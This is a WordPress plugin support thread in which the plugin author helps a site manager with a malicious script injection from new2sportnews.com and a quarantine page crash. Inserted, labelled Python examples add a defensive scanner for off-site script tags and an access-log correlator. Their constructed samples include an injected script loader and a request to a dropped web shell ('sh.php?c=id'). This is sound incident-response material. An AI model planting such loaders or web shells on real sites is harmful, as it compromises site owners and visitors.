• Hi Eli! I just made a donation, cheers!

    Recently learned that a site I help manage was infected with the following: https://new2sportnews.com/insidepulse.js, apparently the site new2sportnews.com is being used to inject malware.

    So two questions, the scan so far hasn’t mentioned anything from this site, but it did find 73 other files. When I tried to delete them, I get an error, and the “View Quarantine” panel says this error:

    “There has been a critical error on this website. Please check your site admin email inbox for instructions.”

    Question 1: can you suggest a way to remove or protect against the new2sportnews malware?

    Question 2: Any idea what’s going on with the quarantined files that I can’t remove?

    Thanks for your help,

    Matt

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter sterndesign

    (@sterndesign)

    Quick follow up, it did find another plugin related file. I cleaned it, but still see this error, see screenshot: https://nimb.ws/WFblKh

    Let me know your thoughts, and thanks again.

    Plugin Author Eli

    (@scheeeli)

    It looks like you have thus far used my plugin to remove 73 infections from your site. Detailed records of these prior infections are stored in the Anti-Malware quarantine, but rest assured that there is nothing further that you would need to do there; those records do not correspond to active threats that require further action but rather to former infections that have already been cleaned.

    It is also clear, however, that you are unable to load the Quarantine page on your site. While this is not functionally impairing your efforts to clean the site, it is still highly important to me that we figure out what is causing this issue so that I can implement any changes that may be needed to correct the specific issue you have encountered. To follow up on Question #2, I will need more info from you to properly troubleshoot the error you have found. Your admin email should have received an email from your site that outlines the specific error that was triggered when the Quarantine page was loaded. If you cannot find that error in your email, then there should also be an error_log file on the server that records all the PHP errors on the site. If you can find the actual error message, then please send it directly to me so that I can look into this further for you. It may contain sensitive information that you might not want to post on this public forum, so you can email me directly with any details that could help me identify the issue at: eli AT gotmls DOT net

    It is a common enough technique that malware injections refer to an external script hosted on another domain, as you have found with the reference to the new2sportnews script. However, the domain in question is not ultimately responsible for this infection and thus should not be solely blamed for the malware you found. In fact, in many cases this same malware may try to place these infected scripts on your own site and then refer to your domain when it injects these malicious links into the code on other sites that are targeted by this same attack, thereby making your site the source of the malware that others find in their code. That is just the nature of these types of infections. Therefore, my Anti-Malware plugin searches your database and the source code on your server looking for malicious patterns like these regardless of the specific domain used to pull up the external scripts. So, you may not ever see the new2sportnews domain mentioned by my plugin when it identifies these threats, even when that is the source that these scripts are currently being loaded from. I hope that answers Question #1.
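    Added example (not part of the thread and not the Anti-Malware plugin's own code) illustrating the point above: a scanner that flags and strips off-site script references by structure rather than by a specific domain, so it catches the loader whether it points at new2sportnews.com or at a copy planted on someone else's site. The sample HTML, the site hostname example-site.test and the SITE_HOSTS allowlist are constructed for the example; the same functions can be run over wp_posts.post_content or wp_options values pulled from the database, since injections land there as often as in theme files.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a page fragment with one local script, one script from the
# site's own host, one injected external loader tag and one injected inline
# loader that builds the same off-site reference at run time.
SAMPLE_HTML = (
    '<html><head>\n'
    '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n'
    '<script src="https://example-site.test/wp-content/themes/x/app.js"></script>\n'
    '<script src="https://new2sportnews.com/insidepulse.js"></script>\n'
    '</head><body>\n'
    '<script>var s=document.createElement("script");'
    's.src="//new2sportnews.com/insidepulse.js";document.head.appendChild(s);</script>\n'
    '</body></html>\n'
)

# Assumption: the site's own hostname(s); anything else is treated as external.
SITE_HOSTS = {"example-site.test"}

# <script ... src="URL" ...></script> with an empty body; the whole tag is removable.
SCRIPT_TAG = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(?P<url>[^"\'\s>]+)[^>]*>\s*</script>',
    re.IGNORECASE,
)
# something.src = "URL" inside inline JS; flagged for review rather than removed,
# because the surrounding loader code is not delimited by the match.
JS_SRC_ASSIGN = re.compile(
    r'\.src\s*=\s*["\'](?P<url>(?:https?:)?//[^"\']+)["\']', re.IGNORECASE
)


def external_host(url, site_hosts):
    """Return the lowercase hostname if url points off-site, else None."""
    u = url.strip()
    if u.startswith("//"):          # protocol-relative URLs are common in injections
        u = "https:" + u
    host = urlsplit(u).hostname     # None for relative paths such as /wp-includes/...
    if host is None or host.lower() in site_hosts:
        return None
    return host.lower()


def scan(text, site_hosts):
    """Find off-site script references; works on file contents or DB fields alike."""
    removable, review = [], []
    for m in SCRIPT_TAG.finditer(text):
        host = external_host(m.group("url"), site_hosts)
        if host:
            removable.append((host, m.group(0)))
    for m in JS_SRC_ASSIGN.finditer(text):
        host = external_host(m.group("url"), site_hosts)
        if host:
            review.append((host, m.group(0)))
    return {"removable": removable, "review": review}


def clean(text, site_hosts):
    """Strip every off-site <script src=...></script> tag; return (text, count)."""
    removed = 0

    def drop(m):
        nonlocal removed
        if external_host(m.group("url"), site_hosts):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_TAG.sub(drop, text), removed


if __name__ == "__main__":
    report = scan(SAMPLE_HTML, SITE_HOSTS)
    for host, snippet in report["removable"]:
        print("remove :", host, snippet)
    for host, snippet in report["review"]:
        print("review :", host, snippet)
    cleaned, n = clean(SAMPLE_HTML, SITE_HOSTS)
    print(f"removed {n} tag(s)")
```

    Two caveats a practitioner should keep in mind: loaders that are hex- or base64-encoded, or emitted by injected PHP rather than present as literal HTML, will not match these two patterns, which is why a real cleaner matches a much wider set of structural signatures; and stripping the reference without finding the entry point only buys time until the next reinjection.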

    Thread Starter sterndesign

    (@sterndesign)

    Thanks for the reply, Eli. Lots to learn here. Site email isn’t working, so I’ll email you directly with some error logs.

    As for the other issue, with the infected file coming from the external domain, is there any way to fix that or stop it from happening again?

    Cheers!

    Matt

    Plugin Author Eli

    (@scheeeli)

    Thanks for those error logs. There are tons of errors from the slim-seo plugin in there, but the only error that relates to my plugin is this one at 28-Feb-2023 19:13:27 UTC:

    PHP Fatal error: Allowed memory size of 268435456 bytes exhausted

    This suggests that the php.ini file on your server has a memory_limit set to 256M and the Quarantine probably needs more memory than that in order to display and rescan each of the files listed in the quarantine.

    There is a chance that this error was unrelated to the Quarantine at all if it happened at a completely different time, though that is the only error triggered by my plugin. There could be an error from another conflicting plugin that is preventing the quarantine from loading, but it would not name my plugin in the log file, so the only way to find that is to correlate the timestamps in the log files with the exact times that you tried to render the Quarantine page.

    Or you could turn on debugging by adding these lines to your wp-config.php file:

    define( 'WP_DEBUG', true );                       // enable WordPress debug mode
    define( 'WP_DEBUG_LOG', true );                   // write errors to wp-content/debug.log
    define( 'WP_DEBUG_DISPLAY', false );              // keep errors off the rendered page
    define( 'WP_DISABLE_FATAL_ERROR_HANDLER', true ); // show the real PHP fatal instead of the "critical error" screen

    As for the other issue, with the external scripts that are infected, you can't do anything about the script itself if it is hosted on another domain which you do not have access to, but you can remove all references to that external script from your site and my plugin should do that for you. And from the 73 items in your Quarantine it sounds like my plugin has already removed a lot of these for you. If these infections are coming back though, you might still have a vulnerability on your site that is being exploited to inject these external references, and that will need to be found and patched. First try deactivating and deleting any themes and plugins that you don't need. If the injections still return after that, then you will need to compare the times of these infections with the activity recorded in your raw access_log files to determine what vulnerable URLs are responsible for this injection and try to link those URLs back to the insecure code that is allowing this exploit.
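    Added example (not from the thread and not the plugin's code) of the last step Eli describes: correlating the modification time of an injected file with the raw access_log to find the request that wrote it, then pivoting on that client's IP to see the whole sequence. The log lines, the IP addresses (documentation ranges), the plugin name example-plugin, the file names and INFECTION_TIME are all constructed for the example; nothing here refers to a real plugin or a real vulnerability.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample access_log (Apache "combined" format, IPs from documentation
# ranges, plugin and file names invented). The attacker probes a plugin, POSTs to
# its upload handler, then runs the dropped PHP file; an unrelated visitor follows.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Feb/2023:18:31:02 +0000] "GET /index.php HTTP/1.1" 200 5123',
    '198.51.100.7 - - [28/Feb/2023:19:01:44 +0000] "GET /wp-content/plugins/example-plugin/readme.txt HTTP/1.1" 200 812',
    '198.51.100.7 - - [28/Feb/2023:19:02:10 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 44',
    '198.51.100.7 - - [28/Feb/2023:19:02:31 +0000] "GET /wp-content/uploads/2023/02/sh.php?c=id HTTP/1.1" 200 231',
    '192.0.2.9 - - [28/Feb/2023:19:03:15 +0000] "GET /wp-content/themes/x/style.css HTTP/1.1" 200 9000',
]

# Assumption: the mtime of the injected file (e.g. from stat on the server), as UTC.
INFECTION_TIME = datetime(2023, 2, 28, 19, 2, 35, tzinfo=timezone.utc)

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def requests_near(lines, event_time, window=timedelta(minutes=10)):
    """All parseable requests within +/- window of the file modification time."""
    recs = [r for r in map(parse_line, lines) if r]
    return [r for r in recs if abs(r["ts"] - event_time) <= window]


def score(rec):
    """Heuristic: writes arrive via POST or via PHP under wp-content, not static GETs."""
    path, _, query = rec["path"].partition("?")
    s = 0
    if rec["method"] == "POST":
        s += 3
    if path.endswith(".php") and path.startswith("/wp-content/"):
        s += 2
    if query:
        s += 1
    if rec["status"] == 200:
        s += 1
    return s


def rank_candidates(recs):
    """Most suspicious first; ties broken by time so the earliest step leads."""
    return sorted(recs, key=lambda r: (-score(r), r["ts"]))


def requests_from_ip(lines, ip):
    """Pivot: everything the suspected client did over the whole log, in order."""
    return [r for r in map(parse_line, lines) if r and r["ip"] == ip]


if __name__ == "__main__":
    ranked = rank_candidates(requests_near(SAMPLE_LOG, INFECTION_TIME))
    for r in ranked:
        print(score(r), r["ts"].isoformat(), r["ip"], r["method"], r["path"], r["status"])
    actor = ranked[0]["ip"]
    print("\nfull history for", actor)
    for r in requests_from_ip(SAMPLE_LOG, actor):
        print(r["ts"].isoformat(), r["method"], r["path"], r["status"])
```

    The top-ranked request is the POST to the plugin's handler just before the file's mtime; pivoting on that IP then shows the readme.txt probe (version fingerprinting) and the follow-up GET to the dropped sh.php. That handler URL is what you trace back to the insecure code. Make sure the log's timezone offset and the file's mtime are compared in the same zone, and widen the window if the server clock and the host's clock are not in sync.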

  • The topic ‘Can’t Clear Quarantined Files’ is closed to new replies.